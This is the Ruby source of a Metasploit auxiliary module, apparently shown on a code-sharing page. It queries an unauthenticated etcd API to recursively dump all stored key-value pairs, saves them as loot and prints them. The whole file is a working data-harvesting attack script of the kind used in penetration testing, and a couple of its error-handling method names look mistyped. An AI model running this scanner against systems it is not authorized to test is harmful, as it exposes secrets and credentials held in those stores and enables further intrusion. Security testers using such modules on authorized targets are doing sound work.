CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/etcd/open_key_scanner.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Etcd

10
  include Msf::Auxiliary::Scanner

11


12
  def initialize

13
    super(

14
      'Name' => 'Etcd Keys API Information Gathering',

15
      'Description' => %q(

16
        This module queries the etcd API to recursively retrieve all of the stored

17
        key value pairs.  Etcd by default does not utilize authentication.

18
      ),

19
      'References' => [

20
        ['URL', 'https://gcollazo.com/the-security-footgun-in-etcd/']

21
      ],

22
      'Author' => [

23
        'Giovanni Collazo <[email protected]>', # discovery

24
        'h00die' # msf module

25
      ],

26
      'License' => MSF_LICENSE,

27
      'DisclosureDate' => "Mar 16 2018"

28
    )

29
  end

30


31
  def run_host(_target_host)

32
    path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')

33


34
    banner = fingerprint_service(target_uri.to_s)

35
    vprint_status("#{peer} - Collecting data through #{path}...")

36
    res = send_request_raw(

37
      'uri'    => path,

38
      'method' => 'GET'

39
    )

40


41
    # parse the json if we got a good request back

42
    if res && res.code == 200

43
      begin

44
        response = res.get_json_document

45
        store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')

46
      rescue JSON::ParserError => e

47
        print_error("Failed to read JSON: #{e.class} - #{e.message}}")

48
        return

49
      end

50
      print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")

51
    elsif res

52
      vprint_errord("Invalid response #{res.code} for etcd open keys response")

53
      return

54
    else

55
      verbose_error("No response for etcd open keys probe")

56
      return

57
    end

58
  end

59
end

60


61